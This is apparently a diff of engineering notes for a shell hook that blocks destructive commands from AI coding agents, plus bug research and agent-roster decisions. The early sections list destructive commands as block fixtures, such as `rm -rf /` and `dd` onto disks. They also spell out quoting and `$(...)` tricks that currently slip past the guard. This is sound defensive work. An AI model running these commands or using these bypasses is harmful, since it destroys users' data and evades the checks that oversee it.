+- All SQL (`DROP TABLE/DATABASE/SCHEMA`, `TRUNCATE`) is **allowed** upstream — Lisa guard 4 is Lisa-only value; keep.
+- `eval "rm -rf ~"` (quoted single arg) is **allowed** upstream (eval is not in `SHELL_WRAPPERS`; the quoted payload is one token). Unquoted `eval rm -rf ~` is blocked via the embedded-token scan. Lisa's quote-boundary fix (F1) will catch the quoted form too — exceeding upstream.
+- `git reflog expire --expire=now --all` (the real reflog nuke) is **allowed** upstream; only `reflog delete` is blocked. Same for `git update-ref -d`, `git filter-branch --force`, `chmod -R 777 /` — all allowed upstream.
+
+## Current-Lisa false-negative check (bypasses upstream would catch)
+
+- **F1 (the big one) — quote adjacency in guard 1's target regex** (L102: `([[:space:]]|=)(target)([[:space:]]|/?\*?$)`): a catastrophic target followed/preceded by a quote char never matches. Verified Lisa-allows / upstream-blocks: `bash -c "rm -rf /"`, `python -c "import os; os.system('rm -rf /')"`, `eval "rm -rf ~"` (upstream misses the eval one too). Fix: add `'"` to both boundary classes. This single regex change closes the wrapper (#25), interpreter (#26), and eval cases at once.
+- **F2 — cwd-relative destruction invisible**: `rm -rf .`, `./`, `../other`, absolute paths outside the project — all allowed (rows #21-22).
+- **F3 — dirty-tree race in guard 3**: `git reset --hard` is checked against `git status` *at hook time*, in the hook's cwd. A `cd /elsewhere && git reset --hard` or a command that first commits/stashes then resets in a subshell evades the dirty check; upstream blocks unconditionally. Accepted residual risk of the deliberate divergence in row #8 — document it in the hook comment.
+- **F4 — flag reordering**: none found. `-r -f`, `-fr`, `--recursive --force`, `sudo`/`env` prefixes all verified blocked. Guard 2 statement-splitting also correctly blocks `git push origin main --force` (trailing flag) and allows `--force-with-lease`.
+- **F5 — no-target forms**: `xargs rm -rf`, `find -exec rm -rf {}` have no catastrophic literal target, so guard 1's two-gate design passes them (rows #28-29).
+
+## Recommended absorb list (minimal default-mode parity)
+
+Each item = proposed guard + block/allow fixtures (these become the test table). All always-on unless noted.
+
+1. **git checkout discard family** — block `git checkout -- <anything>`, `git checkout <ref> -- <path>`, `git checkout -f/--force`, `git checkout --pathspec-from-file`, `git checkout .` (exceeds upstream, per #1960).
+   Allow: `git checkout -b feature`, `git checkout main`, `git checkout feature-.dotted` (only bare `.`), `git checkout -B branch`.
+2. **git switch discard** — block `--discard-changes`, `-f/--force`. Allow `git switch main`, `git switch -c new`.
+3. **git restore** — block `git restore <path>` and `--worktree`; allow when `--staged` present without `--worktree` (needs a two-condition bash check like guard 2, not a single ERE — ERE has no lookahead). Allow: `git restore --staged file.ts`.
+4. **git stash drop|clear** — block both (any args). Allow `git stash`, `push`, `pop`, `list`, `apply`.
+5. **git clean force** — block `-f`/`--force` (incl. clusters `-fd`, `-xfd`); allow `-n`/`--dry-run` even with `-f` absent... allow fixture: `git clean -n`, near-miss `git clean -nd`.
+6. **git branch force-delete** — block `-D` and `-d`+`-f`/cluster `-df`; allow `git branch -d x`, `git branch -m x`.
+7. **git reset --merge** — add alongside `--hard` in guard 3 (same dirty-tree condition). Allow `git reset --soft/--keep/--mixed`.
+8. **git tag -d / git reflog delete / git worktree remove --force** — three cheap EREs. Allow: `git tag v1`, `git reflog`, `git worktree remove wt`.
+9. **rm target hardening (extends guard 1)** — additionally block when recursive+force AND target is: `.`/`./` (bare), contains `..` path component, absolute path not under `${CLAUDE_PROJECT_DIR:-$PWD}` and not under `/tmp`,`/var/tmp`,`$TMPDIR`; `$VAR`-containing target other than `$TMPDIR/${TMPDIR}`; plus `[ "$PWD" = "$HOME" ]` gate. Allow: `rm -rf build`, `rm -rf ./build`, `rm -rf /tmp/x`, `rm -rf "$TMPDIR/x"`.
+10. **Quote-aware boundaries in guard 1** (F1) — change target boundary classes to include `'` and `"`. Block fixtures: `bash -c "rm -rf /"`, `python -c "import os; os.system('rm -rf /')"`, `eval "rm -rf ~"`. Allow fixture: `echo "docs about rm -rf / go here"`? — NOTE: unlike upstream, a grep hook cannot exempt display commands; accept the echo/grep false-positive (upstream's `DISPLAY_COMMANDS` exemption is engine-only) and document the workaround (quote-breaking or manual run).
+11. **find/xargs deletion** — block `find ... -delete`, `find ... -exec rm <recursive+force flags>`, `xargs ... rm <recursive+force flags>`. Allow: `find . -name x -print`, `find /tmp -exec rm {} +` (no recursive flag), `xargs grep x`.
+12. **Disk destroyers (exceeds upstream's interpreter-only placement)** — always-on EREs for `dd ...of=/dev/...`, `mkfs[.fs] /dev/...`, `shred <arg>`. Block: `dd if=/dev/zero of=/dev/sda`. Allow: `dd if=a.img of=backup.img`, `dd of=./local.img`.
+13. **Fail-closed exit code** — trap parse/jq errors to exit 2 (row #40).
+
+**Paranoid-mode recommendation:** keep `SAFETY_NET_PARANOID_RM` / `SAFETY_NET_PARANOID_INTERPRETERS`
+**skipped** (not even env-gated) for now: upstream ships them off-by-default, they would break routine
+agent work, and Lisa's per-project ERE rules file is the existing opt-in mechanism for stricter projects.
+Revisit only on operator demand. Worktree relaxation likewise skipped until Lisa has the discard guards
+it would relax.
+
+## Classification counts
+
+- **already-covered:** 5 (rows 8, 19, 20, 33 + row 11's protected-branch core) — 2 of them deliberate divergences to document (8, 11)
+- **material-absorb:** 22 (rows 1-7, 9, 10, 12-14, 17, 18, 21-29 collapsed into absorb items 1-13, 40)
+- **deliberately-skip:** 10 (rows 11-full-parity, 15, 16, 30, 31, 32, 34-39) — reasons: opt-in paranoid modes (34-36), stateful-engine-only analysis (30-32, 37), documented design decisions (38, 39), sanctioned agent workflows (11, 15, 16)
+- **Lisa-only value upstream lacks (keep):** SQL DROP/TRUNCATE guard, protected-branch semantics, `rm -rf *` wildcard block, heredoc fail-closed classifier, flat ERE rules file.

--- a/.lisa/research-1982.md
+++ b/.lisa/research-1982.md
@@ -1,0 +1,14 @@
+# T1 Research — #1982 (explorer-1982 deliverable, persisted by lead)
+
+Root causes CONFIRMED on current main (unshifted by PR #1994):
+- RM_CATASTROPHIC_TARGET (L208-209) trailing boundary class lacks `)` — `-rf /)` fails to match.
+- Token-walk guard 1b (L244-255) strips only one leading quote — `"$(rm` -> `$(rm` != rm, seen_rm never trips.
+- Statement splitter (L291) + RM_CMD (L187) DO deliver the statement to the guards; flag gate matches.
+- Weaknesses UNIQUE to rm two-gate design. SQL (L467-469), dd/mkfs/shred (L455-463), custom rules (L472-482) already block subst-wrapped forms (verified empirically exit=2).
+- BONUS gap: bare command-proper `$(rm -rf /)` at top level also exit=0 (same token-walk cause).
+- Signaling: pure exit code — block()=stderr+exit 2, allow=exit 0; harness asserts status only.
+- Tests: fixtures tests/helpers/safety-net-guard-fixtures.ts (fx(id,command,expected,guard); guard consts L27-47; STATELESS_FIXTURES L80-314; QUOTE_BOUNDARY template QB-B1..B6 L164-179, QB-A1..A3 L180-182). Harness runs FANNED copy plugins/lisa/hooks/parity-safety-net.sh — must build:plugins after src edit. New family in STATELESS_FIXTURES is auto-consumed by it.each in parity-safety-net-guards.test.ts (no test-file change needed).
+- Env in harness: GIT_* stripped, CLAUDE_PROJECT_DIR=cwd, SAFETY_NET_RULES_FILE=nonexistent.
+- Documented text-scan class: in-file header L48-52 + plugins/src/base/skills/lisa-parity-safety-net-rules/SKILL.md L98-101 (update both if class widens; fanned x4 + .codex-plugin).
+- Empirical baseline: exit=0 for `echo "$(rm -rf /)"` (BUG), `echo '$(rm -rf /)'` (correct allow), bare `$(rm -rf /)` (bonus gap); exit=2 for subst-wrapped SQL/dd/shred and QB-B1 baseline.
+- Fixer seams: (a) add `)` to trailing boundary class L209; (b) normalize `$(`/`"$(` prefix in token-walk so `"$(rm` -> rm. Preserve single-quote-inert ALLOW.

--- a/.lisa/research-1995.md
+++ b/.lisa/research-1995.md
@@ -1,0 +1,70 @@
+# Research map — #1995 (explorer-1995 deliverable, lead summary)
+
+## Headline reframing
+Suggested fix #1 (fs lock) is ALREADY IMPLEMENTED and wired in. `src/core/learnings-lock.ts` (377 lines,
+hard-link protocol, stale reclaim with the #1878 TOCTOU hardening) wraps the whole read-modify-write in
+`persistConsolidatedLearning` (src/core/learnings-writer.ts:72-89) and `confirmLearningEntry` (:144-180).
+Same-process AND cross-process concurrency regression tests already pass.
+
+The observed corruption is a **git merge artifact, not a torn write**. Conflict markers can only come from git.
+Each learner pass runs on its own branch `learning/<fingerprint>` in its own worktree
+(plugins/src/base/skills/lisa-persist-learning/SKILL.md Phase 3 step 4), so N concurrent passes produce N
+concurrent PRs merging the same JSONL block. A path-scoped lock provably cannot serialize two worktrees.
+The "lost consolidation target" is the same cross-branch cause: writer A supersedes id X on its branch;
+writer B's branch never saw X removed.
+
+## Scope decision (lead)
+- **IN — Fix #4 (parse guard):** conflict-marker scan in src/core/learnings-document.ts before the fence check
+  at :38, throwing a specific "corrupted by concurrent write — recompact" error instead of the generic
+  `Invalid project learnings file format` / `Invalid project learnings JSONL payload`. Wire remediation into
+  src/core/learnings-budget-check.ts:109-124. Cheapest, highest signal; flows straight into the CI gate.
+- **IN — Fix #3 (git-layer root cause):** `.gitattributes` (repo has NONE today) + union-by-id merge driver.
+  Entries are one-JSON-per-line sorted by id (learnings-writer.ts:228-230) and duplicate ids already rejected,
+  so a driver can deterministically union by id, re-render via renderLearningsFile, re-assert budget.
+  Must ship to host projects via the template/apply path, not only the Lisa repo.
+- **IN — Fix #1 hardening:** the writer has NO fsync (compare src/standards/storage.ts:136-142 which syncs file
+  + containing dir). Extract the atomic temp-write+rename block duplicated 4x
+  (learnings-writer.ts:77-87 and :164-173, health/storage.ts:~98-110, standards/storage.ts:130-146).
+- **OUT — Fix #2 (append-only intake + gardener compaction):** largest option, a contract/format change with the
+  full 5-tree plugin fan-out and every contract-parity test in play. Issue says "any of" — record as deferred.
+
+## Key file:line anchors
+- Writer chokepoint: src/core/learnings-writer.ts — persistConsolidatedLearning :58-90, confirmLearningEntry
+  :126-181, buildNextDocument (supersede + missing-id throw) :210-234, validateSupersedeIds :241-256.
+- Parse/render/budget: src/core/learnings-document.ts — parseLearningsFile :32-54 (byte guard :33-37,
+  fence check :38-43, parseJsonLines :127-136), assertDocumentBudget :62-78.
+- Safety: src/core/learnings-file-safety.ts — resolveSafeLearningTarget :13-25, readExistingLearnings :32-69,
+  assertSafeLearningParents :76-91.
+- Lock: src/core/learnings-lock.ts — withLearningTargetLock :27-32, withFileTargetLock :40-56,
+  observeStaleLock :158-177, reclaimObservedStaleLock :185-208, pinnedLockStillStale :219-247.
+  Constants :4-6 (200 attempts, 10ms, 30s stale).
+- Budget contract: src/core/learnings-contract.ts — MAX_ENTRIES 20 :14, PER_ENTRY_BYTE_ALLOWANCE 600 :37
+  (an AVERAGE), maxTokens 12000 :39-56.
+- Gate: src/core/learnings-budget-check.ts :63-97, remediation text :109-124.
+  CI: .github/workflows/quality.yml:636-653 (self-detects Lisa source repo since PR #2007).
+
+## Test surface
+- tests/unit/core/learnings-writer.test.ts (310 lines) — same-process concurrency :132-142, repeated contention
+  :145-161, malformed fence :268-284.
+- tests/unit/core/learnings-concurrency.test.ts (82 lines) — THE cross-process template: inline writer source
+  :16-24, spawns 10 real `bun --eval` children :60-71.
+- tests/unit/health/storage.test.ts:334 — second cross-process lock template.
+- Harness: vitest, createTempDir() from tests/helpers/test-utils.ts:27-29, ledger at <tmp>/.lisa/PROJECT_LEARNINGS.md.
+- NO test exists for conflict-marker input, cross-branch/merge behavior, or a merge driver.
+- TRAP: a test shelling out to real git MUST strip all GIT_* env keys (hook-set GIT_DIR/GIT_WORK_TREE poison
+  temp repos; passes standalone, fails under pre-push).
+
+## Obligations
+- Ledger surfaces fan out from plugins/src/base: agents/learner.md -> 4 copies; skills (persist-learning,
+  debrief-apply, learnings-audit, 3x build-intake) -> 5 copies each incl .codex-plugin;
+  rules/*/project-learnings.md -> 2 trees. Rebuild with `bun run build:plugins`, verify `bun run check:plugins`.
+- `bun run build:upstream-evidence-manifest` in the SAME commit for any template/source edit; and stage new
+  files BEFORE regenerating (the generator walks git ls-files).
+- Contract-parity tests assert literal substrings in generated skills:
+  tests/unit/strategies/learner-capture-contract.test.ts, debrief-reroute-contract.test.ts,
+  learnings-confirmation-contract.test.ts, learnings-audit-contract.test.ts, project-learnings-rule-pair.test.ts,
+  promotion-contract-rule.test.ts, tests/unit/templates/project-learnings-template.test.ts.
+
+## Current state
+Real ledger is 11577/12000 bytes = 96.5% full, ~423B headroom, so supersede-in-place is effectively mandatory
+for every new capture right now — the racing-write pattern is maximally likely today.

--- a/.lisa/roster-1956.md
+++ b/.lisa/roster-1956.md
@@ -1,0 +1,24 @@
+# Roster Decision — plan: work-item-sync-lanes (CodySwannGT/lisa#1956)
+
+Runtime: Claude Code, implicit-team model. Work type: Fix (bug) — Reproduce sub-flow mandatory.
+
+INCLUDE - Explore - flow-required read-only research (validator internals, hook state machine, existing test harnesses for lisa-work-item.mjs).
+INCLUDE - lisa:bug-fixer - owns Reproduce-first TDD: failing tests for all three wedge lanes, then the fixes.
+INCLUDE - lisa:security-specialist - two changes weaken-or-refine gates (work-item validation range exclusion; safety-net rebase --abort allowance) — must prove no laundering lane opens (e.g. foreign-commit exclusion cannot exempt branch-authored commits; --abort allowance cannot discard real conflict resolutions).
+INCLUDE - lisa:quality-specialist - validator JS + hook shell conventions, test quality, skill-text accuracy.
+INCLUDE - lisa:verification-specialist - independent verdict incl. live end-to-end rebase + merge-sync + push in a scratch bound repo.
+INCLUDE - lisa:spec-conformance-specialist - maps shipped work to the 5 suggested fixes + derived AC.
+INCLUDE - lisa:learner - flow-required learnings pass.
+INCLUDE - general-purpose - bounded one-shot chores only (input resolution already done).
+EXCLUDE - lisa:builder - bug-fixer owns Fix-type implementation; no separate feature build.
+EXCLUDE - lisa:test-specialist - repro-test design is intrinsic to bug-fixer's Reproduce mandate here (validator has existing unit-test conventions to follow); a separate matrix designer added value for the 138-fixture guard wall, not for three targeted repro lanes.
+EXCLUDE - lisa:debug-specialist - root causes already diagnosed with line-level evidence (assertStateBranch unconditional gate; parsePushLines range; safety-net abort guard).
+EXCLUDE - lisa:architecture-specialist - fixes are localized to one script + one hook + one skill text; no cross-cutting design needed (issue enumerates the design).
+EXCLUDE - lisa:performance-specialist / lisa:product-specialist / lisa:git-history-analyzer - not relevant to this defect class.
+EXCLUDE - lisa:pr-mining-specialist / lisa:tracker-mining-specialist / lisa:learnings-synthesizer - Debrief-flow agents.
+EXCLUDE - lisa:github-agent / jira-agent / linear-agent / all *-intake - lifecycle wrappers and queue scanners; this session orchestrates.
+EXCLUDE - lisa:skill-evaluator - reached via learner.
+EXCLUDE - code-simplifier / coderabbit:code-reviewer / claude-code-guide / Plan / claude / statusline-setup - as in roster-1960 (PR-side review covers CodeRabbit; no API questions; lead owns planning).
+EXCLUDE - chief/casey/felix/lex/mark/parker/sally - tunnl business-domain agents, irrelevant.
+
+All spawns model=opus.

--- a/.lisa/roster-1957.md
+++ b/.lisa/roster-1957.md
@@ -1,0 +1,18 @@
+# Roster Decision — plan: linear-bare-repo-label (CodySwannGT/lisa#1957)
+
+Runtime: Claude Code, implicit-team model. Work type: Fix (bug) — Reproduce-first.
+
+INCLUDE - Explore - flow-required; bounded map of assertRepoScope/component-fallback/Linear bind path + the intake-side bare-label matching rule to mirror.
+INCLUDE - lisa:bug-fixer - repro-first TDD: failing Linear-shaped bind test, then the Option-A fix.
+INCLUDE - lisa:quality-specialist - review with an explicit security lens folded in (see exclusion note below).
+INCLUDE - lisa:verification-specialist - independent verdict incl. live bind simulation with Linear-shaped labels.
+INCLUDE - lisa:learner - flow-required.
+INCLUDE - general-purpose - bounded chores only.
+EXCLUDE - lisa:security-specialist - the change widens an accepted label vocabulary within the SAME authority domain (Linear labels already grant scope via repo:<name>; bare <name> is equally authored content — no new trust boundary crossed, unlike #1956's push-range/abort relaxations). The quality review is explicitly tasked with verifying no cross-repo mis-scoping lane opens; if it finds one, a dedicated security pass will be added.
+EXCLUDE - lisa:spec-conformance-specialist - the issue has no AC/journey sections (thin by Lisa standards); the plan's completion condition IS the derived spec and the verifier proves it directly — a separate conformance matrix over a one-function fix duplicates the verifier.
+EXCLUDE - lisa:test-specialist - repro design is intrinsic to the single-lane fix; existing suite conventions apply.
+EXCLUDE - lisa:debug-specialist / architecture-specialist - root cause and design already line-diagnosed in the issue.
+EXCLUDE - lisa:builder - Fix type; bug-fixer owns it.
+EXCLUDE - performance/product/git-history/debrief agents, lifecycle wrappers, intake scanners, skill-evaluator (via learner), code-simplifier, coderabbit reviewer, claude-code-guide, Plan, claude, statusline-setup, business-domain agents - same rationale as roster-1956.
+
+All spawns model=opus.

--- a/.lisa/roster-1958.md
+++ b/.lisa/roster-1958.md
@@ -1,0 +1,18 @@
+# Roster Decision — plan: heredoc-classifier-fps (CodySwannGT/lisa#1958)
+
+Runtime: Claude Code, implicit-team model. Work type: Improve (enhancement label) — but repro-first discipline anyway: the false positives are reproducible behaviors and the change relaxes a security classifier, so red fixtures precede any code.
+
+INCLUDE - Explore - flow-required; MANDATORY fresh-anchor pass (both #1976 and #1979 rewrote the hook today — every line citation in the issue is presumed stale).
+INCLUDE - lisa:builder - Improve-type implementation, TDD.
+INCLUDE - lisa:security-specialist - REQUIRED: the change reclassifies a class of heredocs from blocked to guard-scanned; must prove quoted-delimiter detection is parser-sound (no half-quoted/mixed/nested trickery reclassifies an EXPANDING heredoc) and that reclassified payloads still trip content guards.
+INCLUDE - lisa:quality-specialist - python classifier + shell hook conventions, message-text accuracy, fixture quality.
+INCLUDE - lisa:verification-specialist - independent verdict incl. live drives of the real hook with the exact TUN-242-era failing commands.
+INCLUDE - lisa:learner - flow-required.
+INCLUDE - general-purpose - bounded chores only.
+EXCLUDE - lisa:bug-fixer - Improve type; builder owns it (repro discipline carried in the plan, not the agent type).
+EXCLUDE - lisa:spec-conformance-specialist - issue is thin (no AC/journey); the plan's completion condition is the derived spec, proven directly by the verifier (same justification as roster-1957).
+EXCLUDE - lisa:test-specialist - fixture design follows the established heredoc/guard suite conventions; single-lane change.
+EXCLUDE - lisa:debug-specialist / architecture-specialist - behaviors already diagnosed to function level; structure unchanged.
+EXCLUDE - performance/product/git-history/debrief agents, lifecycle wrappers, intake scanners, skill-evaluator (via learner), code-simplifier, coderabbit reviewer, claude-code-guide, Plan, claude, statusline-setup, business-domain agents - same rationale as roster-1956/1957.
+
+All spawns model=opus.

--- a/.lisa/roster-1959.md
+++ b/.lisa/roster-1959.md
@@ -1,0 +1,17 @@
+# Roster Decision — plan: learnings-ledger-budget (CodySwannGT/lisa#1959)
+
+Runtime: Claude Code, implicit-team model. Work type: Fix (bug label) — a contract/budget correction + saturation-signal emission. Repro-first discipline.
+
+INCLUDE - Explore - flow-required; map the executable ledger contract, the budget check script (scripts/check-learnings-budget.ts), the persist mechanism (persistLearningEntry / persistConsolidatedLearning), where the 20-entry and 4000-byte caps are defined, and how a "gardener queue item" is emitted elsewhere (so the saturation signal reuses an existing channel, not a novel one).
+INCLUDE - lisa:bug-fixer - repro-first TDD: demonstrate byte-cap-binds-before-entry-cap saturation + silent drop, then the fixes.
+INCLUDE - lisa:quality-specialist - the saturation signal creates an external artifact (gardener-queue item / overflow file) — review for spam/idempotency (don't emit on every capture), design soundness, contract-doc accuracy, test quality.
+INCLUDE - lisa:verification-specialist - independent verdict incl. a live capture that now fits ~20 entries and emits the signal on drop; also confirms conformance to the scoped suggested-fix set.
+INCLUDE - lisa:learner - flow-required — AND this flow's own fix should let its stranded drafts (and the 9 from #1960/#1956/#1957/#1958) finally persist; the learner validates that dogfood.
+INCLUDE - general-purpose - bounded chores only.
+EXCLUDE - lisa:security-specialist - no trust boundary crossed; a budget integer + a signal file/issue emission. The gardener-signal's external-artifact concern (spam/idempotency) is folded into the quality review, which will escalate to a security pass only if it finds an injection/abuse lane.
+EXCLUDE - lisa:spec-conformance-specialist - issue has no AC; the plan's completion condition is the derived spec and the verifier proves it + maps the scoped fixes (consistent with roster-1957/1958 for thin issues).
+EXCLUDE - lisa:builder - Fix type; bug-fixer owns it.
+EXCLUDE - lisa:test-specialist / debug-specialist / architecture-specialist - single well-diagnosed contract fix; the issue enumerates root cause and the fix menu.
+EXCLUDE - performance/product/git-history/debrief agents, lifecycle wrappers, intake scanners, skill-evaluator (via learner), code-simplifier, coderabbit reviewer, claude-code-guide, Plan, claude, statusline-setup, business-domain agents - same rationale as prior rosters this session.
+
+All spawns model=opus.

--- a/.lisa/roster-1960.md
+++ b/.lisa/roster-1960.md
@@ -1,0 +1,50 @@
+# Roster Decision — plan: safety-net-guard-parity (CodySwannGT/lisa#1960)
+
+Runtime: Claude Code, implicit-team model (Agent tool). Recorded before spawning
+any lifecycle/research/implementation/review/verification specialist
+(input-resolver was the single permitted pre-roster spawn).
+
+INCLUDE - Explore - required by the flow; read-only audit of upstream safety-net 1.0.6 cache tree vs Lisa's hook source.
+INCLUDE - lisa:architecture-specialist - maps the guard-absorption design (hook structure, fixture-test placement, retirement touchpoints) before code changes.
+INCLUDE - lisa:builder - implements guard absorption + retirement via TDD against acceptance criteria.
+INCLUDE - lisa:test-specialist - designs the allow/block fixture matrix driven through the real hook (the AC's explicit test contract).
+INCLUDE - lisa:security-specialist - the change IS a security control; reviews that no guard weakens and absorbed guards can't be trivially bypassed.
+INCLUDE - lisa:quality-specialist - reviews correctness/conventions of hook shell code and skill/doc updates.
+INCLUDE - lisa:verification-specialist - independent empirical verdict (runs the real hook fixtures, drift gate, install-script tests) and writes .lisa/verification-status.json.
+INCLUDE - lisa:spec-conformance-specialist - checks shipped work against the issue's three AC bullets and the ordering constraint (parity before retirement).
+INCLUDE - lisa:learner - required by the flow; processes task learnings at the end.
+INCLUDE - general-purpose - fallback only for bounded one-shot chores with no fitting specialist; every use must be bounded.
+EXCLUDE - lisa:bug-fixer - work type is Improve, not Fix; no reproduction sub-flow applies.
+EXCLUDE - lisa:debug-specialist - no unexplained failure to root-cause; guard gaps are already enumerated.
+EXCLUDE - lisa:performance-specialist - a grep-based hook has no perf surface worth a specialist.
+EXCLUDE - lisa:product-specialist - no user-facing UX; developer tooling only.
+EXCLUDE - lisa:git-history-analyzer - relevant history (#1955, c6c931e7f) already captured in the input-resolver bundle.
+EXCLUDE - lisa:pr-mining-specialist - Debrief-flow agent, not Implement.
+EXCLUDE - lisa:tracker-mining-specialist - Debrief-flow agent, not Implement.
+EXCLUDE - lisa:learnings-synthesizer - Debrief-flow agent, not Implement.
+EXCLUDE - lisa:github-agent - lifecycle wrapper; this session IS the lifecycle orchestrator.
+EXCLUDE - lisa:jira-agent - wrong tracker and lifecycle wrapper.
+EXCLUDE - lisa:linear-agent - wrong tracker and lifecycle wrapper.
+EXCLUDE - lisa:github-build-intake - queue scanner; single item already dispatched.
+EXCLUDE - lisa:jira-build-intake - queue scanner, wrong tracker.
+EXCLUDE - lisa:linear-build-intake - queue scanner, wrong tracker.
+EXCLUDE - lisa:notion-prd-intake - PRD intake, not Implement.
+EXCLUDE - lisa:confluence-prd-intake - PRD intake, not Implement.
+EXCLUDE - lisa:github-prd-intake - PRD intake, not Implement.
+EXCLUDE - lisa:linear-prd-intake - PRD intake, not Implement.
+EXCLUDE - lisa:skill-evaluator - invoked by learner downstream if warranted, not directly.
+EXCLUDE - code-simplifier:code-simplifier - shell hook diff is small; quality-specialist covers review polish.
+EXCLUDE - coderabbit:code-reviewer - CodeRabbit reviews land on the PR itself; duplicate here.
+EXCLUDE - claude-code-guide - no Claude Code / API usage questions in scope.
+EXCLUDE - Plan - lead session owns implement-flow planning; architecture-specialist covers design.
+EXCLUDE - chief - tunnl-backend business-domain agent, irrelevant to lisa internals.
+EXCLUDE - casey - business-domain agent, irrelevant.
+EXCLUDE - felix - business-domain agent, irrelevant.
+EXCLUDE - lex - business-domain agent, irrelevant.
+EXCLUDE - mark - business-domain agent, irrelevant.
+EXCLUDE - parker - business-domain agent, irrelevant.
+EXCLUDE - sally - business-domain agent, irrelevant.
+EXCLUDE - claude - catch-all; specific specialists cover all work.
+EXCLUDE - statusline-setup - irrelevant to this work.
+
+All teammate spawns use model=opus (owner preference).

--- a/.lisa/roster-1978.md
+++ b/.lisa/roster-1978.md
@@ -1,0 +1,32 @@
+# Roster Decision — plan 1978-validate-pr-ci-backstop
+
+Work item: CodySwannGT/lisa#1978 — wire `lisa-work-item.mjs validate-pr` into Lisa's own CI as the
+server-side backstop for #1956's client-side push-range exclusion.
+Work type: Build (task — a new CI gate). Base branch: `main`. Runtime: Claude Code implicit-team model.
+
+Enumeration of every agent type exposed by the Agent tool:
+
+- INCLUDE - lisa:builder - Owns the build: research the validate-pr contract + downstream template shape, add the workflow gate, and write the reproducer fixtures. Combined research+implement because the surface is one script contract plus one workflow job.
+- INCLUDE - Explore - Read-only search capability is folded into the builder's research step for this item (the search space is two known files: scripts/lisa-work-item.mjs and .github/workflows/quality.yml plus the downstream template). Recorded as covered rather than spawned separately; a dedicated Explore adds a round-trip without adding coverage here.
+- INCLUDE - general-purpose - Team-lead session utility tasks (worktree setup, binding, plan bookkeeping).
+- INCLUDE - lisa:security-specialist - The gate exists BECAUSE of a security review finding (symref-repoint bypass); an independent pass must confirm the CI gate actually closes the hole rather than reimplementing the bypassable client-side logic server-side.
+- INCLUDE - lisa:quality-specialist - Independent review of the workflow wiring and test fixtures before PR.
+- INCLUDE - lisa:verification-specialist - Independent empirical verification and the verdict file; must not be the implementer.
+- INCLUDE - lisa:learner - Required: learnings reviewed post-implementation.
+- EXCLUDE - lisa:bug-fixer - This is a Build (new gate), not a defect repair; no reproduce-then-fix cycle over broken behavior.
+- EXCLUDE - lisa:test-specialist - The test design is dictated by the AC (two named fixtures: the bypass reproducer must fail, a merge-synced PR must pass); builder writes them and quality-specialist reviews. Revisit if the fixtures prove subtle.
+- EXCLUDE - lisa:architecture-specialist - Shape is fixed by the downstream template this repo already ships; the job is parity, not design.
+- EXCLUDE - lisa:debug-specialist - Nothing to diagnose; the gap is a known absent workflow.
+- EXCLUDE - lisa:performance-specialist - One short CI job; no performance surface.
+- EXCLUDE - lisa:product-specialist - No user-facing UX.
+- EXCLUDE - lisa:spec-conformance-specialist - Three concrete ACs; verification + quality cover conformance.
+- EXCLUDE - lisa:git-history-analyzer - #1956 history already summarized in the issue and its review artifacts.
+- EXCLUDE - lisa:skill-evaluator - Invoked by learner if warranted.
+- EXCLUDE - lisa:learnings-synthesizer / pr-mining-specialist / tracker-mining-specialist - Debrief-flow agents.
+- EXCLUDE - lisa:github-agent / jira-agent / linear-agent - Lifecycle dispatchers; this flow IS the lifecycle.
+- EXCLUDE - lisa:*-build-intake / *-prd-intake - Queue scanners; single item already claimed.
+- EXCLUDE - coderabbit:code-reviewer - CodeRabbit reviews arrive on the PR via CI.
+- EXCLUDE - code-simplifier:code-simplifier - A security gate; simplification risks weakening the check.
+- EXCLUDE - claude / claude-code-guide / statusline-setup - Catch-all or tooling-help agents.
+- EXCLUDE - casey / chief / felix / lex / mark / parker / sally - tunnl-backend business-domain agents; wrong repo.
+- EXCLUDE - Plan - Approach follows from the downstream template; no separate planning agent needed.

--- a/.lisa/roster-1982.md
+++ b/.lisa/roster-1982.md
@@ -1,0 +1,31 @@
+# Roster Decision — plan 1982-content-guard-subst-in-double-quotes
+
+Work item: CodySwannGT/lisa#1982 — safety-net content guards miss `$(...)` nested in double quotes.
+Work type: Fix (bug / security hardening). Runtime: Claude Code implicit-team model (Agent tool).
+
+Enumeration of every agent type exposed by the Agent tool, one line each:
+
+- INCLUDE - Explore - Mandatory read-only research agent; maps guard code paths, fixture matrix, and build-plugins fan-out before implementation.
+- INCLUDE - general-purpose - Team-lead session utility tasks (branch sync, plan bookkeeping) per the implement skill; input-resolver already ran as this type.
+- INCLUDE - lisa:bug-fixer - Owns the mandatory Reproduce sub-flow (failing fixtures driving the real hook) and the TDD fix in plugins/src/base/hooks/parity-safety-net.sh.
+- INCLUDE - lisa:security-specialist - The change widens a security guard; must threat-model which substitution-wrapped forms are executable-destructive vs inert to avoid overblocking-trains-bypass.
+- INCLUDE - lisa:test-specialist - Designs the SUBST_BOUNDARY block/allow fixture matrix extension and reviews test quality.
+- INCLUDE - lisa:quality-specialist - Independent code review of the fix before PR.
+- INCLUDE - lisa:verification-specialist - Independent empirical verification (runs the real hook against payloads) and writes .lisa/verification-status.json; must not be the implementer.
+- INCLUDE - lisa:learner - Required: each task's learnings reviewed post-implementation.
+- EXCLUDE - lisa:debug-specialist - Root cause already isolated to exact lines by the #1958 security review and input bundle; no open diagnosis question.
+- EXCLUDE - lisa:architecture-specialist - Single-file shell hook change with an established pattern; no architectural design needed.
+- EXCLUDE - lisa:builder - Fix flow, not a feature Build.
+- EXCLUDE - lisa:performance-specialist - A few regex/token checks in a hook; no performance surface.
+- EXCLUDE - lisa:product-specialist - No user-facing UX; developer security hook.
+- EXCLUDE - lisa:spec-conformance-specialist - Acceptance criteria are three concrete testable bullets; verification-specialist + quality-specialist cover conformance without a separate matrix agent.
+- EXCLUDE - lisa:git-history-analyzer - History context already gathered (#1958/#1960/PR #1994) by input-resolver.
+- EXCLUDE - lisa:skill-evaluator - Invoked by learner if warranted, not a direct teammate.
+- EXCLUDE - lisa:learnings-synthesizer / lisa:pr-mining-specialist / lisa:tracker-mining-specialist - Debrief-flow agents, not implement-flow.
+- EXCLUDE - lisa:github-agent / lisa:jira-agent / lisa:linear-agent - Lifecycle dispatchers; this flow IS the lifecycle.
+- EXCLUDE - lisa:github-build-intake / lisa:jira-build-intake / lisa:linear-build-intake / lisa:github-prd-intake / lisa:linear-prd-intake / lisa:notion-prd-intake / lisa:confluence-prd-intake - Queue scanners/intake agents; single-item flow already claimed.
+- EXCLUDE - coderabbit:code-reviewer - CodeRabbit reviews arrive on the PR via CI; a local duplicate adds noise.
